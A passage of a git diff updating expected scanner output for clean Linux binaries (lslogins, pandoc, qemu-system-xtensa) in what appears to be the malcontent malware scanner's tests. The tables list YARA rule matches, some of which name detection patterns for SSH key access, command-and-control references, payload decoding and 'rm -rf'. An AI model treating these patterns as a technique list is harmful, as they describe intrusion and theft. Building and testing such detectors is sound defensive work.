[https://www.gnu.org/software/coreutils/](https://www.gnu.org/software/coreutils/) | diff --git a/tests/linux/clean/lslogins.md b/tests/linux/clean/lslogins.md index cf3dff5a7..ede252252 100644 --- a/tests/linux/clean/lslogins.md +++ b/tests/linux/clean/lslogins.md @@ -21,7 +21,6 @@ | LOW | [fs/path/var](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/var.yara#var_path) | path reference within /var | [/var/log/btmp](https://github.com/search?q=%2Fvar%2Flog%2Fbtmp&type=code)
[/var/log/lastlog](https://github.com/search?q=%2Fvar%2Flog%2Flastlog&type=code)
[/var/log/wtmp](https://github.com/search?q=%2Fvar%2Flog%2Fwtmp&type=code)
[/var/run/nologin](https://github.com/search?q=%2Fvar%2Frun%2Fnologin&type=code) | | LOW | [fs/tempdir](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/tempdir/tempdir.yara#tempdir) | looks up location of temp directory | [TMPDIR](https://github.com/search?q=TMPDIR&type=code) | | LOW | [fs/tempdir/TMPDIR](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/tempdir/TMPDIR.yara#TMPDIR) | TMPDIR | [TMPDIR](https://github.com/search?q=TMPDIR&type=code)
[getenv](https://github.com/search?q=getenv&type=code) | -| LOW | [hw/dev/ubi](https://github.com/chainguard-dev/malcontent/blob/main/rules/hw/dev/ubi.yara#expected_ubi_users) | expected ubi users | [Usage:](https://github.com/search?q=Usage%3A&type=code) | | LOW | [os/fd/sendfile](https://github.com/chainguard-dev/malcontent/blob/main/rules/os/fd/sendfile.yara#sendfile) | [transfer data between file descriptors](https://man7.org/linux/man-pages/man2/sendfile.2.html) | [sendfile](https://github.com/search?q=sendfile&type=code) | | LOW | [process/groupid_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/groupid-set.yara#setregid) | set real and effective group ID of process | [setregid](https://github.com/search?q=setregid&type=code) | | LOW | [process/userid_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/userid-set.yara#setuid) | [set real and effective user ID of current process](https://man7.org/linux/man-pages/man2/setuid.2.html) | [setuid](https://github.com/search?q=setuid&type=code) | diff --git a/tests/linux/clean/pandoc.md b/tests/linux/clean/pandoc.md index 609fc4915..cfcfe07e9 100644 --- a/tests/linux/clean/pandoc.md +++ b/tests/linux/clean/pandoc.md @@ -20,7 +20,7 @@ | MEDIUM | [data/hash/whirlpool](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/hash/whirlpool.yara#whirlpool) | [hash function often used for cryptomining](https://en.wikipedia.org/wiki/Whirlpool_(hash_function)) | [WHIRLPOOL](https://github.com/search?q=WHIRLPOOL&type=code) | | MEDIUM | [discover/group/lookup](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/group/lookup.yara#getgrent) | get entry from group database | [endgrent](https://github.com/search?q=endgrent&type=code)
[getgrent](https://github.com/search?q=getgrent&type=code)
[setgrent](https://github.com/search?q=setgrent&type=code) | | MEDIUM | [discover/network/netstat](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/network/netstat.yara#netstat) | Uses 'netstat' for network information | [netstat](https://github.com/search?q=netstat&type=code) | -| MEDIUM | [discover/process/effective_groupid_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/process/effective-groupid-get.yara#php_getmygid) | returns the effective group id of the current process | [getmygid](https://github.com/search?q=getmygid&type=code) | +| MEDIUM | [discover/process/egid](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/process/egid.yara#php_getmygid) | returns the effective group id of the current process | [getmygid](https://github.com/search?q=getmygid&type=code) | | MEDIUM | [discover/process/name](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/process/name.yara#process_name) | get the current process name | [process_name](https://github.com/search?q=process_name&type=code) | | MEDIUM | [discover/user/name_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/user/username-get.yara#whoami) | [returns the user name running this process](https://man7.org/linux/man-pages/man1/whoami.1.html) | [whoami](https://github.com/search?q=whoami&type=code) | | MEDIUM | [evasion/file/prefix](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/file/prefix/prefix.yara#static_hidden_path) | possible hidden file path | [/home/linuxbrew/.linuxbrew](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew&type=code) | @@ -97,7 +97,6 @@ | LOW | [discover/user/HOME](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/user/HOME.yara#HOME) | [Looks up the HOME directory for the current user](https://man.openbsd.org/login.1#ENVIRONMENT) | [HOME](https://github.com/search?q=HOME&type=code)
[getenv](https://github.com/search?q=getenv&type=code) | | LOW | [discover/user/USER](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/user/USER.yara#USER) | [Looks up the USER name of the current user](https://man.openbsd.org/login.1#ENVIRONMENT) | [USER](https://github.com/search?q=USER&type=code)
[getenv](https://github.com/search?q=getenv&type=code) | | LOW | [evasion/logging/acct](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/logging/acct.yara#acct) | switch process accounting on or off | [acct](https://github.com/search?q=acct&type=code) | -| LOW | [evasion/process_injection/ptrace](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/process_injection/ptrace.yara#known_ptrace_injectors) | known ptrace injectors | [BPF](https://github.com/search?q=BPF&type=code) | | LOW | [exec/conditional/LANG](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/conditional/LANG.yara#LANG_getenv) | Looks up language of current user | [LANG](https://github.com/search?q=LANG&type=code)
[getenv](https://github.com/search?q=getenv&type=code) | | LOW | [exec/dylib/iterate](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/dylib/iterate.yara#dl_iterate_phdr) | [iterate over list of shared objects](https://man7.org/linux/man-pages/man3/dl_iterate_phdr.3.html) | [dl_iterate_phdr](https://github.com/search?q=dl_iterate_phdr&type=code) | | LOW | [exec/plugin](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/plugin/plugin.yara#plugin) | references a 'plugin' | [Plugin_Abstract](https://github.com/search?q=Plugin_Abstract&type=code)
[QAccessiblePlugin](https://github.com/search?q=QAccessiblePlugin&type=code)
[QAudioSystemPlugin](https://github.com/search?q=QAudioSystemPlugin&type=code)
[QGenericPluginFactory](https://github.com/search?q=QGenericPluginFactory&type=code)
[QIconEnginePlugin](https://github.com/search?q=QIconEnginePlugin&type=code)
[QImageIOPlugin](https://github.com/search?q=QImageIOPlugin&type=code)
[QMediaServiceProviderPlugin](https://github.com/search?q=QMediaServiceProviderPlugin&type=code)
[QPictureFormatPlugin](https://github.com/search?q=QPictureFormatPlugin&type=code)
[QPluginLoader](https://github.com/search?q=QPluginLoader&type=code)
[QQmlEngineExtensionPlugin](https://github.com/search?q=QQmlEngineExtensionPlugin&type=code)
[QQmlExtensionPlugin](https://github.com/search?q=QQmlExtensionPlugin&type=code)
[QScriptExtensionPlugin](https://github.com/search?q=QScriptExtensionPlugin&type=code)
[QSqlDriverPlugin](https://github.com/search?q=QSqlDriverPlugin&type=code)
[QStaticPlugin](https://github.com/search?q=QStaticPlugin&type=code)
[QStylePlugin](https://github.com/search?q=QStylePlugin&type=code)
[QTextToSpeechPlugin](https://github.com/search?q=QTextToSpeechPlugin&type=code)
[QVirtualKeyboardExtensionPlugin](https://github.com/search?q=QVirtualKeyboardExtensionPlugin&type=code)
[addCorePlugin_closure](https://github.com/search?q=addCorePlugin_closure&type=code)
[addCorePlugin_info](https://github.com/search?q=addCorePlugin_info&type=code)
[enabledPlugin](https://github.com/search?q=enabledPlugin&type=code)
[js plugins](https://github.com/search?q=js+plugins&type=code)
[msession_plugin](https://github.com/search?q=msession_plugin&type=code)
[mysqlnd_uh_server_option_plugin_dir](https://github.com/search?q=mysqlnd_uh_server_option_plugin_dir&type=code)
[plugin_abstract](https://github.com/search?q=plugin_abstract&type=code)
[plugin_path](https://github.com/search?q=plugin_path&type=code)
[qAddCorePlugin_closure](https://github.com/search?q=qAddCorePlugin_closure&type=code)
[qAddCorePlugin_info](https://github.com/search?q=qAddCorePlugin_info&type=code) | diff --git a/tests/linux/clean/qemu-system-xtensa.md b/tests/linux/clean/qemu-system-xtensa.md index a3b559e84..d59d71b9d 100644 --- a/tests/linux/clean/qemu-system-xtensa.md +++ b/tests/linux/clean/qemu-system-xtensa.md @@ -1,99 +1,98 @@ ## linux/clean/qemu-system-xtensa [🛑 HIGH] -| RISK | KEY | DESCRIPTION | EVIDENCE | -|--------|---------------------------------------------------------------------------------------------------------------------------------------------------------------|------------------------------------------------------------------------------------------------------------------------------------------------------------|------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------| -| HIGH | [crypto/xor](https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/xor.yara#xor_decode_encode) | decodes/encodes XOR content | [Opcode_xor_encode_fns](https://github.com/search?q=Opcode_xor_encode_fns&type=code) | -| MEDIUM | [c2/addr/ip](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/ip.yara#ip_port_mention) | mentions an IP and port | [IP](https://github.com/search?q=IP&type=code)
[Ip](https://github.com/search?q=Ip&type=code)
[Port](https://github.com/search?q=Port&type=code)
[add_port](https://github.com/search?q=add_port&type=code)
[ahci_port](https://github.com/search?q=ahci_port&type=code)
[and_port](https://github.com/search?q=and_port&type=code)
[be_port](https://github.com/search?q=be_port&type=code)
[claim_port](https://github.com/search?q=claim_port&type=code)
[clear_port](https://github.com/search?q=clear_port&type=code)
[compare_ip](https://github.com/search?q=compare_ip&type=code)
[ehci_port](https://github.com/search?q=ehci_port&type=code)
[extract_ip](https://github.com/search?q=extract_ip&type=code)
[find_port](https://github.com/search?q=find_port&type=code)
[fix_port](https://github.com/search?q=fix_port&type=code)
[get_ip](https://github.com/search?q=get_ip&type=code)
[get_port](https://github.com/search?q=get_port&type=code)
[handle_port](https://github.com/search?q=handle_port&type=code)
[host_port](https://github.com/search?q=host_port&type=code)
[hub_port](https://github.com/search?q=hub_port&type=code)
[megasas_port](https://github.com/search?q=megasas_port&type=code)
[mem_port](https://github.com/search?q=mem_port&type=code)
[message_port](https://github.com/search?q=message_port&type=code)
[metadata_ip](https://github.com/search?q=metadata_ip&type=code)
[mmio_port](https://github.com/search?q=mmio_port&type=code)
[mptsas_port](https://github.com/search?q=mptsas_port&type=code)
[ohci_port](https://github.com/search?q=ohci_port&type=code)
[pcie_port](https://github.com/search?q=pcie_port&type=code)
[register_port](https://github.com/search?q=register_port&type=code)
[release_port](https://github.com/search?q=release_port&type=code)
[remove_port](https://github.com/search?q=remove_port&type=code)
[reset_port](https://github.com/search?q=reset_port&type=code)
[serial_port](https://github.com/search?q=serial_port&type=code)
[spdm_port](https://github.com/search?q=spdm_port&type=code)
[state_port](https://github.com/search?q=state_port&type=code)
[throttle_port](https://github.com/search?q=throttle_port&type=code)
[uhci_port](https://github.com/search?q=uhci_port&type=code)
[update_ip](https://github.com/search?q=update_ip&type=code)
[upstream_port](https://github.com/search?q=upstream_port&type=code)
[usb_port](https://github.com/search?q=usb_port&type=code)
[virtser_port](https://github.com/search?q=virtser_port&type=code)
[write_port](https://github.com/search?q=write_port&type=code)
[xhci_port](https://github.com/search?q=xhci_port&type=code) | -| MEDIUM | [c2/addr/server](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/server.yara#server_address) | references a 'server address', possible C2 client | [vnc_init_basic_info_from_server_addr](https://github.com/search?q=vnc_init_basic_info_from_server_addr&type=code) | -| MEDIUM | [c2/refs](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/refs.yara#command_and_control) | Uses terms that may reference a command and control server | [c2_port](https://github.com/search?q=c2_port&type=code) | -| MEDIUM | [collect/databases/sqlite](https://github.com/chainguard-dev/malcontent/blob/main/rules/collect/databases/sqlite.yara#sqlite) | accesses SQLite databases | [sqlite](https://github.com/search?q=sqlite&type=code) | -| MEDIUM | [credential/ssh](https://github.com/chainguard-dev/malcontent/blob/main/rules/credential/ssh/ssh.yara#ssh_folder) | [accesses SSH configuration and/or keys](https://www.sentinelone.com/blog/macos-malware-2023-a-deep-dive-into-emerging-trends-and-evolving-techniques/) | [~/.ssh/config](https://github.com/search?q=~%2F.ssh%2Fconfig&type=code) | -| MEDIUM | [data/base64/decode](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/base64/base64-decode.yara#py_base64_decode) | decode base64 strings | [base64_decode](https://github.com/search?q=base64_decode&type=code) | -| MEDIUM | [discover/network/mac_address](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/network/mac-address.yara#macaddr) | Retrieves network MAC address | [MAC address](https://github.com/search?q=MAC+address&type=code) | -| MEDIUM | [evasion/file/prefix](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/file/prefix/prefix.yara#static_hidden_path) | possible hidden file path | [/home/linuxbrew/.linuxbrew](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew&type=code) | -| MEDIUM | [evasion/indicator_blocking/vm](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/indicator_blocking/vm.yara#hidden_qemu) | operates a QEMU VM | [QEMU_VFIO](https://github.com/search?q=QEMU_VFIO&type=code)
[unable to find CPU model '%s'](https://github.com/search?q=unable+to+find+CPU+model+%27%25s%27&type=code) | -| MEDIUM | [exec/cmd](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/cmd/cmd.yara#exec) | executes a command | [qapi_free_MigrationExecCommand](https://github.com/search?q=qapi_free_MigrationExecCommand&type=code)
[visit_type_MigrationExecCommand_members](https://github.com/search?q=visit_type_MigrationExecCommand_members&type=code) | -| MEDIUM | [exec/program](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/program/program.yara#execall) | executes external programs | [execv](https://github.com/search?q=execv&type=code) | -| MEDIUM | [exec/shell/exec](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/shell/exec.yara#calls_shell) | executes shell | [/bin/sh](https://github.com/search?q=%2Fbin%2Fsh&type=code) | -| MEDIUM | [exec/tty/open](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/tty/open.yara#openpty) | finds and opens an available pseudoterminal | [openpty](https://github.com/search?q=openpty&type=code) | -| MEDIUM | [fs/attributes/set](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/attributes/set.yara#remove_xattr) | [set an extended file attribute value](https://developer.apple.com/library/archive/documentation/System/Conceptual/ManPages_iPhoneOS/man2/setxattr.2.html) | [setxattr](https://github.com/search?q=setxattr&type=code) | -| MEDIUM | [fs/file/delete_forcibly](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-delete-forcibly.yara#rm_recursive_force) | Forcibly deletes files recursively | [rm -rf](https://github.com/search?q=rm+-rf&type=code) | -| MEDIUM | [fs/file/times_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-times-set.yara#shell_toucher) | change file timestamps | [touch event kind](https://github.com/search?q=touch+event+kind&type=code)
[touch event type](https://github.com/search?q=touch+event+type&type=code)
[touch slot number](https://github.com/search?q=touch+slot+number&type=code) | -| MEDIUM | [fs/path/home](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/home.yara#home_path) | references path within /home | [/home/linuxbrew/.linuxbrew/Cellar/qemu/9.1.0/bin](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2FCellar%2Fqemu%2F9.1.0%2Fbin&type=code)
[/home/linuxbrew/.linuxbrew/Cellar/qemu/9.1.0/etc/qemu-ifdown](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2FCellar%2Fqemu%2F9.1.0%2Fetc%2Fqemu-ifdown&type=code)
[/home/linuxbrew/.linuxbrew/Cellar/qemu/9.1.0/etc/qemu-ifup](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2FCellar%2Fqemu%2F9.1.0%2Fetc%2Fqemu-ifup&type=code)
[/home/linuxbrew/.linuxbrew/Cellar/qemu/9.1.0/etc/qemu/qemu.conf](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2FCellar%2Fqemu%2F9.1.0%2Fetc%2Fqemu%2Fqemu.conf&type=code)
[/home/linuxbrew/.linuxbrew/Cellar/qemu/9.1.0/libexec/qemu-bridge-helpe](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2FCellar%2Fqemu%2F9.1.0%2Flibexec%2Fqemu-bridge-helpe&type=code)
[/home/linuxbrew/.linuxbrew/Cellar/qemu/9.1.0/share/icons](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2FCellar%2Fqemu%2F9.1.0%2Fshare%2Ficons&type=code)
[/home/linuxbrew/.linuxbrew/Cellar/qemu/9.1.0/share/locale](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2FCellar%2Fqemu%2F9.1.0%2Fshare%2Flocale&type=code)
[/home/linuxbrew/.linuxbrew/Cellar/qemu/9.1.0/share/qemu-firmware](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2FCellar%2Fqemu%2F9.1.0%2Fshare%2Fqemu-firmware&type=code)
[/home/linuxbrew/.linuxbrew/Cellar/qemu/9.1.0/var](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2FCellar%2Fqemu%2F9.1.0%2Fvar&type=code)
[/home/linuxbrew/.linuxbrew/lib/ld.so](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Flib%2Fld.so&type=code)
[/home/linuxbrew/.linuxbrew/opt/at-spi2-core/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fat-spi2-core%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/attr/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fattr%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/berkeley-db](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fberkeley-db&type=code)
[/home/linuxbrew/.linuxbrew/opt/binutils/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fbinutils%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/bzip2/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fbzip2%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/cairo/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fcairo%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/capstone/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fcapstone%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/dbus/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fdbus%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/dtc/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fdtc%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/elfutils/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Felfutils%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/expat/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fexpat%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/fontconfig/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Ffontconfig%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/freeglut/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Ffreeglut%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/freetype/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Ffreetype%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/fribidi/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Ffribidi%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/gcc/lib/gcc/current](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fgcc%2Flib%2Fgcc%2Fcurrent&type=code)
[/home/linuxbrew/.linuxbrew/opt/gdk-pixbuf/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fgdk-pixbuf%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/glib/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fglib%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/glslang/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fglslang%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/gmp/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fgmp%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/gnutls/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fgnutls%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/graphite2/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fgraphite2%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/gsettings-desktop-schemas/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fgsettings-desktop-schemas%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/gtk](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fgtk&type=code)
[/home/linuxbrew/.linuxbrew/opt/harfbuzz/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fharfbuzz%2Flib&type=code)
